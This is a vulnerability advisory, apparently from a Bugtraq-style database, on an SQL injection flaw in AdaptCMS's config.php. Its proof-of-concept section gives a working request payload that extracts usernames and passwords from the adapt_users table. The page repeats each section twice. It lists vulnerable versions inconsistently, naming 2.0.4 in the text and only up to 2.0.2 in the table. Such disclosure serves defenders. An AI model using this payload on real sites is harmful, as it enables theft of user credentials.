AdaptCMS 'config.php' SQL Injection Vulnerability
BID:57674
Info
AdaptCMS 'config.php' SQL Injection Vulnerability
| Bugtraq ID: | 57674 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 04 2013 12:00AM |
| Updated: | Feb 04 2013 12:00AM |
| Credit: | kallimero |
| Vulnerable: |
AdaptCMS AdaptCMS 2.0.2 AdaptCMS AdaptCMS 2.0.1 AdaptCMS AdaptCMS 2.0 |
| Not Vulnerable: | |
Discussion
AdaptCMS 'config.php' SQL Injection Vulnerability
AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.4 and prior are vulnerable.
AdaptCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.4 and prior are vulnerable.
Exploit / POC
AdaptCMS 'config.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example request is available:
article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )
Attackers can use a browser to exploit this issue.
The following example request is available:
article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )
Solution / Fix
AdaptCMS 'config.php' SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].